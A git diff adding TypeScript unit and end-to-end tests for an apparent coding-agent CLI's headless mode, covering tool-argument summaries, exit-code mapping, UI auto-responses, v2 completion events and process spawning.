+  it('prefers path over file_path when both present', () => {
+    assert.equal(summarizeToolArgs('read', { path: 'real.ts', file_path: 'legacy.ts' }), 'real.ts')
+  })
+
+  it('extracts command for bash', () => {
+    assert.equal(summarizeToolArgs('bash', { command: 'ls -la' }), 'ls -la')
+  })
+
+  it('truncates long bash commands', () => {
+    const longCmd = 'a'.repeat(100)
+    const result = summarizeToolArgs('bash', { command: longCmd })
+    assert.ok(result.endsWith('...'))
+    assert.ok(result.length < 100)
+  })
+
+  it('extracts command for async_bash', () => {
+    assert.equal(summarizeToolArgs('async_bash', { command: 'npm run build' }), 'npm run build')
+  })
+
+  it('extracts jobs for await_job', () => {
+    assert.equal(summarizeToolArgs('await_job', { jobs: ['bg_abc', 'bg_def'] }), 'bg_abc, bg_def')
+  })
+
+  it('extracts pattern for grep', () => {
+    const result = summarizeToolArgs('grep', { pattern: 'TODO', glob: '*.ts' })
+    assert.equal(result, 'TODO *.ts')
+  })
+
+  it('extracts pattern and path for find', () => {
+    assert.equal(summarizeToolArgs('find', { pattern: '*.ts', path: 'src' }), '*.ts in src')
+  })
+
+  it('extracts action and file for lsp', () => {
+    const result = summarizeToolArgs('lsp', { action: 'definition', file: 'src/main.ts', symbol: 'foo' })
+    assert.equal(result, 'definition src/main.ts foo')
+  })
+
+  it('extracts path for ls', () => {
+    assert.equal(summarizeToolArgs('ls', { path: 'src/utils' }), 'src/utils')
+  })
+
+  it('summarizes gsd tool with milestone/slice/task IDs', () => {
+    assert.equal(summarizeToolArgs('gsd_task_complete', {
+      milestoneId: 'M001', sliceId: 'S01', taskId: 'T01', oneLiner: 'Built the thing',
+    }), 'M001/S01/T01 Built the thing')
+  })
+
+  it('summarizes gsd_plan_milestone with milestone ID', () => {
+    assert.equal(summarizeToolArgs('gsd_plan_milestone', { milestoneId: 'M002' }), 'M002')
+  })
+
+  it('summarizes gsd_decision_save with decision text', () => {
+    const result = summarizeToolArgs('gsd_decision_save', { decision: 'Use SQLite for persistence' })
+    assert.equal(result, 'Use SQLite for persistence')
+  })
+
+  it('returns first string value for unknown tools', () => {
+    assert.equal(summarizeToolArgs('custom_tool', { someKey: 'hello' }), 'hello')
+  })
+
+  it('returns empty string for no args', () => {
+    assert.equal(summarizeToolArgs('unknown', {}), '')
+  })
+
+  it('extracts path for edit', () => {
+    assert.equal(summarizeToolArgs('edit', { path: 'src/config.ts' }), 'src/config.ts')
+  })
+
+  it('extracts path for hashline_edit', () => {
+    assert.equal(summarizeToolArgs('hashline_edit', { path: 'src/main.ts' }), 'src/main.ts')
+  })
+
+  it('extracts agent and task for subagent', () => {
+    assert.equal(summarizeToolArgs('subagent', { agent: 'scout', task: 'Find auth patterns' }), 'scout: Find auth patterns')
+  })
+
+  it('extracts url for browser_navigate', () => {
+    assert.equal(summarizeToolArgs('browser_navigate', { url: 'http://localhost:3000' }), 'http://localhost:3000')
+  })
+})
+
+describe('formatThinkingLine', () => {
+  it('formats short text', () => {
+    const result = formatThinkingLine('Analyzing the codebase')
+    assert.ok(result.includes('[thinking]'))
+    assert.ok(result.includes('Analyzing the codebase'))
+  })
+
+  it('truncates long text to ~120 chars', () => {
+    const longText = 'word '.repeat(50) // 250 chars
+    const result = formatThinkingLine(longText)
+    assert.ok(result.includes('...'))
+  })
+
+  it('collapses whitespace', () => {
+    const result = formatThinkingLine('line one\n\nline   two\ttab')
+    assert.ok(result.includes('line one line two tab'))
+  })
+})
+
+describe('formatCostLine', () => {
+  it('formats cost with token count', () => {
+    const result = formatCostLine(0.0523, 4200, 1100)
+    assert.ok(result.includes('$0.0523'))
+    assert.ok(result.includes('5300 tokens'))
+  })
+})
diff --git a/src/tests/headless-query-extension-path.test.ts b/src/tests/headless-query-extension-path.test.ts
new file mode 100644
index 000000000..499509187
--- /dev/null
+++ b/src/tests/headless-query-extension-path.test.ts
@@ -0,0 +1,28 @@
+/**
+ * Regression test for #3471: headless-query must load extensions from
+ * the synced agent directory, not directly from src/resources/.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+test("headless-query resolves from agent extensions dir (#3471)", () => {
+  const src = readFileSync(join(__dirname, "..", "headless-query.ts"), "utf-8");
+  assert.ok(
+    src.includes("agentExtensionsDir") || src.includes(".gsd/agent"),
+    "headless-query must resolve from synced agent directory",
+  );
+});
+
+test("cli.ts calls initResources before headless (#3471)", () => {
+  const src = readFileSync(join(__dirname, "..", "cli.ts"), "utf-8");
+  const headlessBlock = src.slice(src.indexOf("gsd headless"));
+  const initIdx = headlessBlock.indexOf("initResources");
+  const runIdx = headlessBlock.indexOf("runHeadless");
+  assert.ok(initIdx !== -1, "initResources must be called before headless");
+  assert.ok(initIdx < runIdx, "initResources must come before runHeadless");
+});
diff --git a/src/tests/headless-v2-migration.test.ts b/src/tests/headless-v2-migration.test.ts
new file mode 100644
index 000000000..1f233b710
--- /dev/null
+++ b/src/tests/headless-v2-migration.test.ts
@@ -0,0 +1,534 @@
+/**
+ * Tests for headless v2 migration — execution_complete handling,
+ * sendUIResponse-based auto-response, and v1 fallback behavior.
+ *
+ * Uses extracted logic mirrors to avoid importing modules with native
+ * dependencies (same pattern as headless-events.test.ts and headless-detection.test.ts).
+ */
+
+import test from 'node:test'
+import assert from 'node:assert/strict'
+
+// ─── Extracted exit codes (mirrors headless-events.ts) ──────────────────────
+
+const EXIT_SUCCESS = 0
+const EXIT_ERROR = 1
+const EXIT_BLOCKED = 10
+
+function mapStatusToExitCode(status: string): number {
+  switch (status) {
+    case 'success':
+    case 'complete':
+      return EXIT_SUCCESS
+    case 'error':
+    case 'timeout':
+      return EXIT_ERROR
+    case 'blocked':
+      return EXIT_BLOCKED
+    case 'cancelled':
+      return 11
+    default:
+      return EXIT_ERROR
+  }
+}
+
+// ─── Extracted terminal detection (mirrors headless-events.ts) ──────────────
+
+const TERMINAL_PREFIXES = ['auto-mode stopped', 'step-mode stopped']
+
+function isTerminalNotification(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false
+  const message = String(event.message ?? '').toLowerCase()
+  return TERMINAL_PREFIXES.some((prefix) => message.startsWith(prefix))
+}
+
+function isBlockedNotification(event: Record<string, unknown>): boolean {
+  if (event.type !== 'extension_ui_request' || event.method !== 'notify') return false
+  const message = String(event.message ?? '').toLowerCase()
+  return message.includes('blocked:')
+}
+
+// ─── Mock RpcClient ─────────────────────────────────────────────────────────
+
+interface SendUICall {
+  id: string
+  response: { value?: string; values?: string[]; confirmed?: boolean; cancelled?: boolean }
+}
+
+class MockRpcClient {
+  sendUICalls: SendUICall[] = []
+  initCalled = false
+  initShouldFail = false
+
+  sendUIResponse(id: string, response: { value?: string; values?: string[]; confirmed?: boolean; cancelled?: boolean }): void {
+    this.sendUICalls.push({ id, response })
+  }
+
+  async init(_options?: { clientId?: string }): Promise<{ protocolVersion: number }> {
+    this.initCalled = true
+    if (this.initShouldFail) {
+      throw new Error('v2 init not supported')
+    }
+    return { protocolVersion: 2 }
+  }
+}
+
+// ─── Extracted handleExtensionUIRequest (mirrors headless-ui.ts) ────────────
+
+interface ExtensionUIRequest {
+  type: 'extension_ui_request'
+  id: string
+  method: string
+  title?: string
+  options?: string[]
+  message?: string
+  prefill?: string
+  [key: string]: unknown
+}
+
+function handleExtensionUIRequest(
+  event: ExtensionUIRequest,
+  client: MockRpcClient,
+): void {
+  const { id, method } = event
+
+  switch (method) {
+    case 'select': {
+      const title = String(event.title ?? '')
+      let selected = event.options?.[0] ?? ''
+      if (title.includes('Auto-mode is running') && event.options) {
+        const forceOption = event.options.find(o => o.toLowerCase().includes('force start'))
+        if (forceOption) selected = forceOption
+      }
+      client.sendUIResponse(id, { value: selected })
+      break
+    }
+    case 'confirm':
+      client.sendUIResponse(id, { confirmed: true })
+      break
+    case 'input':
+      client.sendUIResponse(id, { value: '' })
+      break
+    case 'editor':
+      client.sendUIResponse(id, { value: event.prefill ?? '' })
+      break
+    case 'notify':
+    case 'setStatus':
+    case 'setWidget':
+    case 'setTitle':
+    case 'set_editor_text':
+      client.sendUIResponse(id, { value: '' })
+      break
+    default:
+      client.sendUIResponse(id, { cancelled: true })
+      break
+  }
+}
+
+// ─── Simulated event handler (mirrors headless.ts event handler logic) ──────
+
+interface EventHandlerState {
+  completed: boolean
+  blocked: boolean
+  exitCode: number
+  v2Enabled: boolean
+  isMultiTurnCommand?: boolean
+}
+
+function handleEvent(
+  eventObj: Record<string, unknown>,
+  state: EventHandlerState,
+  client: MockRpcClient,
+): void {
+  // execution_complete (v2 structured completion)
+  // Skip for multi-turn commands (auto, next) — their completion is detected via
+  // isTerminalNotification, not per-turn events
+  if (eventObj.type === 'execution_complete' && !state.completed && !state.isMultiTurnCommand) {
+    state.completed = true
+    const status = String(eventObj.status ?? 'success')
+    state.exitCode = mapStatusToExitCode(status)
+    if (eventObj.status === 'blocked') state.blocked = true
+    return
+  }
+
+  // extension_ui_request (v1 fallback + UI responses)
+  if (eventObj.type === 'extension_ui_request') {
+    if (isBlockedNotification(eventObj)) {
+      state.blocked = true
+    }
+
+    if (isTerminalNotification(eventObj)) {
+      state.completed = true
+    }
+
+    handleExtensionUIRequest(eventObj as unknown as ExtensionUIRequest, client)
+
+    if (state.completed) {
+      state.exitCode = state.blocked ? EXIT_BLOCKED : EXIT_SUCCESS
+      return
+    }
+  }
+}
+
+// ─── execution_complete event handling ──────────────────────────────────────
+
+test('execution_complete with status success triggers completion with EXIT_SUCCESS', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true }
+
+  handleEvent({ type: 'execution_complete', status: 'success' }, state, client)
+
+  assert.equal(state.completed, true)
+  assert.equal(state.exitCode, EXIT_SUCCESS)
+  assert.equal(state.blocked, false)
+})
+
+test('execution_complete with status blocked sets blocked flag and EXIT_BLOCKED', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true }
+
+  handleEvent({ type: 'execution_complete', status: 'blocked' }, state, client)
+
+  assert.equal(state.completed, true)
+  assert.equal(state.blocked, true)
+  assert.equal(state.exitCode, EXIT_BLOCKED)
+})
+
+test('execution_complete with status error maps to EXIT_ERROR', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true }
+
+  handleEvent({ type: 'execution_complete', status: 'error' }, state, client)
+
+  assert.equal(state.completed, true)
+  assert.equal(state.exitCode, EXIT_ERROR)
+})
+
+test('execution_complete with missing status defaults to success', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true }
+
+  handleEvent({ type: 'execution_complete' }, state, client)
+
+  assert.equal(state.completed, true)
+  assert.equal(state.exitCode, EXIT_SUCCESS)
+})
+
+test('execution_complete ignored if already completed', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: true, blocked: false, exitCode: EXIT_SUCCESS, v2Enabled: true }
+
+  handleEvent({ type: 'execution_complete', status: 'error' }, state, client)
+
+  // Should not change exitCode because already completed
+  assert.equal(state.exitCode, EXIT_SUCCESS)
+})
+
+// ─── v1 string-matching fallback ────────────────────────────────────────────
+
+test('v1 fallback: terminal notification still triggers completion', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: false }
+
+  handleEvent(
+    { type: 'extension_ui_request', method: 'notify', id: 'n1', message: 'Auto-mode stopped — all slices complete' },
+    state,
+    client,
+  )
+
+  assert.equal(state.completed, true)
+  assert.equal(state.exitCode, EXIT_SUCCESS)
+})
+
+test('v1 fallback: blocked notification sets blocked flag', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: false }
+
+  handleEvent(
+    { type: 'extension_ui_request', method: 'notify', id: 'n1', message: 'Auto-mode stopped (Blocked: plan invalid)' },
+    state,
+    client,
+  )
+
+  assert.equal(state.completed, true)
+  assert.equal(state.blocked, true)
+  assert.equal(state.exitCode, EXIT_BLOCKED)
+})
+
+test('string-matching fallback works when execution_complete never received', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: false }
+
+  // Simulate a normal session without execution_complete
+  handleEvent({ type: 'extension_ui_request', method: 'select', id: 'q1', options: ['option1'] }, state, client)
+  assert.equal(state.completed, false)
+
+  handleEvent(
+    { type: 'extension_ui_request', method: 'notify', id: 'n1', message: 'Step-mode stopped — done' },
+    state,
+    client,
+  )
+  assert.equal(state.completed, true)
+  assert.equal(state.exitCode, EXIT_SUCCESS)
+})
+
+// ─── handleExtensionUIRequest uses client.sendUIResponse ────────────────────
+
+test('handleExtensionUIRequest select calls sendUIResponse with value', () => {
+  const client = new MockRpcClient()
+
+  handleExtensionUIRequest(
+    { type: 'extension_ui_request', id: 'sel1', method: 'select', options: ['option-a', 'option-b'] },
+    client,
+  )
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'sel1')
+  assert.equal(client.sendUICalls[0].response.value, 'option-a')
+})
+
+test('handleExtensionUIRequest confirm calls sendUIResponse with confirmed', () => {
+  const client = new MockRpcClient()
+
+  handleExtensionUIRequest(
+    { type: 'extension_ui_request', id: 'conf1', method: 'confirm' },
+    client,
+  )
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'conf1')
+  assert.equal(client.sendUICalls[0].response.confirmed, true)
+})
+
+test('handleExtensionUIRequest input calls sendUIResponse with empty value', () => {
+  const client = new MockRpcClient()
+
+  handleExtensionUIRequest(
+    { type: 'extension_ui_request', id: 'inp1', method: 'input' },
+    client,
+  )
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'inp1')
+  assert.equal(client.sendUICalls[0].response.value, '')
+})
+
+test('handleExtensionUIRequest notify calls sendUIResponse with empty value', () => {
+  const client = new MockRpcClient()
+
+  handleExtensionUIRequest(
+    { type: 'extension_ui_request', id: 'not1', method: 'notify', message: 'Task complete' },
+    client,
+  )
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'not1')
+  assert.equal(client.sendUICalls[0].response.value, '')
+})
+
+test('handleExtensionUIRequest editor calls sendUIResponse with prefill', () => {
+  const client = new MockRpcClient()
+
+  handleExtensionUIRequest(
+    { type: 'extension_ui_request', id: 'ed1', method: 'editor', prefill: 'initial text' },
+    client,
+  )
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'ed1')
+  assert.equal(client.sendUICalls[0].response.value, 'initial text')
+})
+
+test('handleExtensionUIRequest unknown method calls sendUIResponse with cancelled', () => {
+  const client = new MockRpcClient()
+
+  handleExtensionUIRequest(
+    { type: 'extension_ui_request', id: 'unk1', method: 'unknown_method' },
+    client,
+  )
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'unk1')
+  assert.equal(client.sendUICalls[0].response.cancelled, true)
+})
+
+// ─── supervised stdin reader forwarding via sendUIResponse ──────────────────
+
+test('extension_ui_response forwarding extracts fields and calls sendUIResponse', () => {
+  // Simulates what startSupervisedStdinReader does with a parsed message
+  const client = new MockRpcClient()
+
+  const msg = { type: 'extension_ui_response', id: 'resp1', value: 'chosen option', confirmed: undefined, cancelled: undefined }
+  const id = String(msg.id ?? '')
+  const value = msg.value !== undefined ? String(msg.value) : undefined
+  const confirmed = typeof msg.confirmed === 'boolean' ? msg.confirmed : undefined
+  const cancelled = typeof msg.cancelled === 'boolean' ? msg.cancelled : undefined
+  client.sendUIResponse(id, { value, confirmed, cancelled })
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'resp1')
+  assert.equal(client.sendUICalls[0].response.value, 'chosen option')
+  assert.equal(client.sendUICalls[0].response.confirmed, undefined)
+  assert.equal(client.sendUICalls[0].response.cancelled, undefined)
+})
+
+test('extension_ui_response with confirmed=true forwards correctly', () => {
+  const client = new MockRpcClient()
+
+  const msg = { type: 'extension_ui_response', id: 'resp2', confirmed: true }
+  const id = String(msg.id ?? '')
+  const confirmed = typeof msg.confirmed === 'boolean' ? msg.confirmed : undefined
+  client.sendUIResponse(id, { confirmed })
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'resp2')
+  assert.equal(client.sendUICalls[0].response.confirmed, true)
+})
+
+// ─── v2 init negotiation ────────────────────────────────────────────────────
+
+test('v2 init success sets v2Enabled', async () => {
+  const client = new MockRpcClient()
+  let v2Enabled = false
+  try {
+    await client.init({ clientId: 'gsd-headless' })
+    v2Enabled = true
+  } catch {
+    // fall back to v1
+  }
+
+  assert.equal(client.initCalled, true)
+  assert.equal(v2Enabled, true)
+})
+
+test('v2 init failure falls back gracefully (v1 mode)', async () => {
+  const client = new MockRpcClient()
+  client.initShouldFail = true
+  let v2Enabled = false
+  try {
+    await client.init({ clientId: 'gsd-headless' })
+    v2Enabled = true
+  } catch {
+    // fall back to v1 — this is expected
+  }
+
+  assert.equal(client.initCalled, true)
+  assert.equal(v2Enabled, false)
+})
+
+// ─── injector adapter ───────────────────────────────────────────────────────
+
+test('injector adapter parses serialized JSONL and calls sendUIResponse', () => {
+  const client = new MockRpcClient()
+
+  // Simulate what the adapter does
+  const data = '{"type":"extension_ui_response","id":"inj1","value":"selected"}\n'
+  const parsed = JSON.parse(data.trim())
+  if (parsed.type === 'extension_ui_response' && parsed.id) {
+    const { id, value, values, confirmed, cancelled } = parsed
+    client.sendUIResponse(id, { value, values, confirmed, cancelled })
+  }
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'inj1')
+  assert.equal(client.sendUICalls[0].response.value, 'selected')
+})
+
+test('injector adapter handles cancelled response', () => {
+  const client = new MockRpcClient()
+
+  const data = '{"type":"extension_ui_response","id":"inj2","cancelled":true}\n'
+  const parsed = JSON.parse(data.trim())
+  if (parsed.type === 'extension_ui_response' && parsed.id) {
+    const { id, value, values, confirmed, cancelled } = parsed
+    client.sendUIResponse(id, { value, values, confirmed, cancelled })
+  }
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'inj2')
+  assert.equal(client.sendUICalls[0].response.cancelled, true)
+})
+
+test('injector adapter handles multi-select values', () => {
+  const client = new MockRpcClient()
+
+  const data = '{"type":"extension_ui_response","id":"inj3","values":["a","b"]}\n'
+  const parsed = JSON.parse(data.trim())
+  if (parsed.type === 'extension_ui_response' && parsed.id) {
+    const { id, value, values, confirmed, cancelled } = parsed
+    client.sendUIResponse(id, { value, values, confirmed, cancelled })
+  }
+
+  assert.equal(client.sendUICalls.length, 1)
+  assert.equal(client.sendUICalls[0].id, 'inj3')
+  assert.deepEqual(client.sendUICalls[0].response.values, ['a', 'b'])
+})
+
+// ─── multi-turn command (auto/next) skips execution_complete ───────────────
+
+test('execution_complete is ignored for multi-turn commands (auto)', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true, isMultiTurnCommand: true }
+
+  handleEvent({ type: 'execution_complete', status: 'success' }, state, client)
+
+  assert.equal(state.completed, false, 'should not mark completed for auto/next commands')
+  assert.equal(state.exitCode, -1, 'exit code should remain unchanged')
+})
+
+test('execution_complete is ignored for multi-turn commands even with error status', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true, isMultiTurnCommand: true }
+
+  handleEvent({ type: 'execution_complete', status: 'error' }, state, client)
+
+  assert.equal(state.completed, false, 'should not mark completed for auto/next commands')
+  assert.equal(state.exitCode, -1, 'exit code should remain unchanged')
+})
+
+test('multi-turn commands still complete via terminal notification', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true, isMultiTurnCommand: true }
+
+  // First, execution_complete fires (should be ignored)
+  handleEvent({ type: 'execution_complete', status: 'success' }, state, client)
+  assert.equal(state.completed, false, 'execution_complete should be skipped')
+
+  // Then the real terminal notification fires
+  handleEvent(
+    { type: 'extension_ui_request', method: 'notify', id: 'n1', message: 'Auto-mode stopped — all slices complete' },
+    state,
+    client,
+  )
+  assert.equal(state.completed, true, 'terminal notification should trigger completion')
+  assert.equal(state.exitCode, EXIT_SUCCESS)
+})
+
+test('multi-turn commands detect blocked via terminal notification', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true, isMultiTurnCommand: true }
+
+  // execution_complete is ignored
+  handleEvent({ type: 'execution_complete', status: 'success' }, state, client)
+  assert.equal(state.completed, false)
+
+  // Blocked terminal notification
+  handleEvent(
+    { type: 'extension_ui_request', method: 'notify', id: 'n2', message: 'Auto-mode stopped (Blocked: plan rejected)' },
+    state,
+    client,
+  )
+  assert.equal(state.completed, true)
+  assert.equal(state.blocked, true)
+  assert.equal(state.exitCode, EXIT_BLOCKED)
+})
+
+test('non-multi-turn commands still complete on execution_complete', () => {
+  const client = new MockRpcClient()
+  const state: EventHandlerState = { completed: false, blocked: false, exitCode: -1, v2Enabled: true, isMultiTurnCommand: false }
+
+  handleEvent({ type: 'execution_complete', status: 'success' }, state, client)
+
+  assert.equal(state.completed, true, 'single-turn commands should complete on execution_complete')
+  assert.equal(state.exitCode, EXIT_SUCCESS)
+})
diff --git a/src/tests/ci_monitor.test.ts b/src/tests/integration/ci_monitor.test.ts
similarity index 98%
rename from src/tests/ci_monitor.test.ts
rename to src/tests/integration/ci_monitor.test.ts
index 745df409f..90449ddbf 100644
--- a/src/tests/ci_monitor.test.ts
+++ b/src/tests/integration/ci_monitor.test.ts
@@ -13,7 +13,7 @@ import { join, dirname } from 'node:path';
 import { fileURLToPath } from 'node:url';
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
-const ROOT = join(__dirname, '..', '..');
+const ROOT = join(__dirname, '..', '..', '..');
 const SCRIPT_PATH = join(ROOT, 'scripts', 'ci_monitor.cjs');
 
 let passed = 0;
diff --git a/src/tests/integration/e2e-headless.test.ts b/src/tests/integration/e2e-headless.test.ts
new file mode 100644
index 000000000..dfb9cd002
--- /dev/null
+++ b/src/tests/integration/e2e-headless.test.ts
@@ -0,0 +1,385 @@
+/**
+ * E2E integration tests for `gsd headless` runtime behavior.
+ *
+ * Spawns real `gsd headless` child processes and asserts on
+ * stdout/stderr/exit-code for: JSON batch mode, SIGINT exit code,
+ * stream-json NDJSON output, --resume error path, and invalid
+ * --output-format handling.
+ *
+ * These tests are structural — they do NOT require API keys.
+ *
+ * Prerequisite: npm run build must be run first.
+ *
+ * Run with:
+ *   node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs \
+ *        --experimental-strip-types --test \
+ *        src/tests/integration/e2e-headless.test.ts
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { spawn } from "node:child_process";
+import { existsSync, mkdtempSync, mkdirSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+const projectRoot = process.cwd();
+const loaderPath = join(projectRoot, "dist", "loader.js");
+
+if (!existsSync(loaderPath)) {
+  throw new Error("dist/loader.js not found — run: npm run build");
+}
+
+// ---------------------------------------------------------------------------
+// Helpers
+// ---------------------------------------------------------------------------
+
+type RunResult = {
+  stdout: string;
+  stderr: string;
+  code: number | null;
+  timedOut: boolean;
+};
+
+/**
+ * Spawn `node dist/loader.js ...args` and collect output.
+ */
+function runGsd(
+  args: string[],
+  timeoutMs = 30_000,
+  env: NodeJS.ProcessEnv = {},
+  cwd: string = projectRoot,
+): Promise<RunResult> {
+  return new Promise((resolve) => {
+    let stdout = "";
+    let stderr = "";
+    let timedOut = false;
+
+    const child = spawn("node", [loaderPath, ...args], {
+      cwd,
+      env: { ...process.env, ...env },
+      stdio: ["pipe", "pipe", "pipe"],
+    });
+
+    child.stdout.on("data", (chunk: Buffer) => { stdout += chunk.toString(); });
+    child.stderr.on("data", (chunk: Buffer) => { stderr += chunk.toString(); });
+
+    child.stdin.end();
+
+    const timer = setTimeout(() => {
+      timedOut = true;
+      child.kill("SIGTERM");
+    }, timeoutMs);
+
+    child.on("close", (code) => {
+      clearTimeout(timer);
+      resolve({ stdout, stderr, code, timedOut });
+    });
+  });
+}
+
+/**
+ * Spawn a child process with the ability to send signals mid-flight.
+ * Returns both the child and a promise that resolves with the result.
+ */
+function spawnGsd(
+  args: string[],
+  timeoutMs = 30_000,
+  env: NodeJS.ProcessEnv = {},
+  cwd: string = projectRoot,
+): { child: ReturnType<typeof spawn>; result: Promise<RunResult> } {
+  let stdout = "";
+  let stderr = "";
+  let timedOut = false;
+
+  const child = spawn("node", [loaderPath, ...args], {
+    cwd,
+    env: { ...process.env, ...env },
+    stdio: ["pipe", "pipe", "pipe"],
+  });
+
+  child.stdout!.on("data", (chunk: Buffer) => { stdout += chunk.toString(); });
+  child.stderr!.on("data", (chunk: Buffer) => { stderr += chunk.toString(); });
+
+  child.stdin!.end();
+
+  const timer = setTimeout(() => {
+    timedOut = true;
+    child.kill("SIGTERM");
+  }, timeoutMs);
+
+  const result = new Promise<RunResult>((resolve) => {
+    child.on("close", (code) => {
+      clearTimeout(timer);
+      resolve({ stdout, stderr, code, timedOut });
+    });
+  });
+
+  return { child, result };
+}
+
+/** Strip ANSI escape codes from a string. */
+function stripAnsi(s: string): string {
+  // eslint-disable-next-line no-control-regex
+  return s.replace(/\x1b\[[0-9;]*[A-Za-z]/g, "");
+}
+
+/** Bootstrap a temp directory with .gsd/ structure (milestones + runtime). */
+function createTempWithGsd(prefix: string): string {
+  const dir = mkdtempSync(join(tmpdir(), prefix));
+  mkdirSync(join(dir, ".gsd", "milestones"), { recursive: true });
+  mkdirSync(join(dir, ".gsd", "runtime"), { recursive: true });
+  return dir;
+}
+
+/** Assert no crash markers in output. */
+function assertNoCrashMarkers(output: string): void {
+  const crashMarkers = [
+    "SyntaxError:",
+    "ReferenceError:",
+    "TypeError: Cannot read",
+    "FATAL ERROR",
+    "ERR_MODULE_NOT_FOUND",
+    "Error: Cannot find module",
+    "SIGSEGV",
+    "SIGABRT",
+  ];
+
+  for (const marker of crashMarkers) {
+    assert.ok(
+      !output.includes(marker),
+      `output should not contain crash marker '${marker}':\n${output.slice(0, 500)}`,
+    );
+  }
+}
+
+// ===========================================================================
+// 1. JSON batch mode suppresses streaming — stdout is a single JSON result
+// ===========================================================================
+
+test("headless --output-format json emits a single HeadlessJsonResult on stdout", async (t) => {
+  const tmpDir = createTempWithGsd("gsd-e2e-json-batch-");
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
+
+  // --max-restarts 0 prevents retry loops which would emit multiple JSON results.
+  // --timeout 2000 ensures the process completes quickly.
+  // Will timeout/error (no API key) but JSON batch mode should emit one HeadlessJsonResult.
+  const result = await runGsd(
+    ["headless", "--output-format", "json", "--timeout", "2000", "--max-restarts", "0", "auto"],
+    45_000,  // generous harness timeout — process needs ~4-6s (2s timeout + startup + cleanup)
+    {},
+    tmpDir,
+  );
+
+  assert.ok(!result.timedOut, "test harness should not time out");
+  // Non-zero exit expected (no API key / timeout), but process may exit 0
+  // if auto-mode detects a conflict and completes immediately.
+  assert.ok(result.code !== null, "process should exit with a code");
+
+  const stdout = result.stdout.trim();
+  assert.ok(stdout.length > 0, `stdout should contain the JSON result, got empty. stderr: ${stripAnsi(result.stderr).slice(0, 300)}`);
+
+  // Must parse as a single JSON object (not NDJSON with multiple lines)
+  let parsed: Record<string, unknown>;
+  try {
+    parsed = JSON.parse(stdout);
+  } catch (e) {
+    assert.fail(
+      `stdout should be valid JSON, got parse error: ${(e as Error).message}\nstdout: ${stdout.slice(0, 500)}`,
+    );
+  }
+
+  // Assert HeadlessJsonResult shape
+  assert.equal(typeof parsed.status, "string", "result should have a string 'status' field");
+  assert.equal(typeof parsed.exitCode, "number", "result should have a number 'exitCode' field");
+  assert.equal(typeof parsed.duration, "number", "result should have a number 'duration' field");
+  assert.equal(typeof parsed.cost, "object", "result should have a 'cost' object");
+  assert.equal(typeof parsed.toolCalls, "number", "result should have a number 'toolCalls' field");
+  assert.equal(typeof parsed.events, "number", "result should have a number 'events' field");
+
+  // Must NOT be NDJSON (multiple newline-separated JSON objects)
+  const lines = stdout.split("\n").filter((l: string) => l.trim().length > 0);
+  assert.equal(lines.length, 1, `expected exactly one JSON line in stdout, got ${lines.length}`);
+
+  const combined = stripAnsi(result.stdout + result.stderr);
+  assertNoCrashMarkers(combined);
+});
+
+// ===========================================================================
+// 2. SIGINT produces exit code 11 (EXIT_CANCELLED)
+// ===========================================================================
+
+test("headless exits with code 11 after SIGINT", async (t) => {
+  const tmpDir = createTempWithGsd("gsd-e2e-sigint-");
+  t.after(() => { rmSync(tmpDir, { recursive: true, force: true }); });
+
+  // Spawn with long timeout and max-restarts 0 so the process stays alive
+  // waiting for completion while we send SIGINT.
+  const { child, result: resultPromise } = spawnGsd(
+    ["headless", "--timeout", "60000", "--max-restarts", "0", "--context-text", "Test context for SIGINT", "new-milestone"],
+    30_000,
+    {},
+    tmpDir,
+  );
+
+  // Wait for stderr output to confirm the process has started and registered
+  // its SIGINT handler (handler is registered before client.start in runHeadlessOnce).
+  let stderrSoFar = "";
+  await new Promise<void>((resolve) => {
+    const check = () => {
+      if (stderrSoFar.length > 0) {
+        resolve();
+      }
+    };
+    child.stderr!.on("data", (chunk: Buffer) => {
